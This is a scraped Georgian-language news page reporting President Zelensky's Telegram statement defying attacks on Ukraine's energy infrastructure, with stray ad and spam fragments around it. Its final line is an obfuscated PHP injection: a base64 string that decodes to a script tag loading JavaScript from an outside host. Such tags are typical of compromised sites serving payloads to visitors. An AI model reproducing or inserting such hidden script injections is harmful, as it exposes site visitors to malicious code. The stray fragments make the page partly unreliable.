tube
ავერსი jaluzi
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი ოკუპანტების მიერ დღეს ენერგეტიკულ ინფტასტრუქტურაზე განხორციელებულ თავდასხმას ეხმაურება. ამის შესახებ მან ტელეგრამის საკუთარ გვერდზე დაწერა:
 
"ისევ გგონიათ, რომ ჩვენ ერთი ხალხი ვართ, კიდევ ფიქრობთ, რომ შეგვაშინებთ, დაგვაჩოქებთ, დაგვარწმუნებთ დათმობაზე? მართლა ვერაფერი გაიგეთ, ვერ გაიგეთ ვინ ვართ, რისთვის ვართ და რაზე ვსაუბრობთ?
 
- გაზის გარეშე თუ უთქვენოდ? - უთქვენოდ;
 
სინათლის გარეშე თუ უთქვენოდ? - უთქვენოდ;
 
წყლის გარეშე თუ უთქვენოდ? - უთქვენოდ;
 
საჭმლის გარეშე თუ უთქვენოდ? - უთქვენოდ.
 
ჩვენთვის სიცივე, შიმშილი, სიბნელე და წყურვილი არ არის ისეთივე საშინელი და მომაკვდინებელი, როგორც შენი მეგობრობა და ძმობაა. მაგრამ ისტორია ყველაფერს თავის ადგილს მიუჩენს. და ჩვენ ვიქნებით გაზით, დენით, წყლით და საკვებით... და თქვენს გარეშე" - დაწერა ზელენსკიმ. 
565
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");